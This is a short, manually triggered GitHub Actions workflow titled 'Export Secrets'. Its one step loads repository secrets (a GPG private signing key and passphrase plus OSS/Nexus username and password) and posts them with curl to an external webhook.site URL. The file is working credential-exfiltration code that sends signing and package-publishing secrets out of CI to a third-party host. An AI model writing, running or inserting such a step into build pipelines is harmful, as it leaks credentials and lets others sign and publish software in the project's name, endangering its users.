name: Export Secrets
on: 
  workflow_dispatch:

jobs:
  send-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Send secrets to API
        env:
          GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }}
          GPG_PASSPHRASE: ${{ secrets.GPG_PASSPHRASE }}
          OSS_USERNAME: ${{ secrets.OSS_USERNAME }}
          OSS_PASSWORD: ${{ secrets.OSS_PASSWORD }}
        run: |
          WEBHOOK_URL="https://webhook.site/59d92671-45c7-4493-a968-667a920c63bf"
          curl -X POST \
            -H "Content-Type: application/json" \
            -d '{
              "gpg_private_key": "'"$GPG_SIGNING_KEY"'",
              "gpg_passphrase": "'"$GPG_PASSPHRASE"'",
              "nexus_username": "'"$OSS_USERNAME"'",
              "nexus_password": "'"$OSS_PASSWORD"'"
            }' \
            "$WEBHOOK_URL"
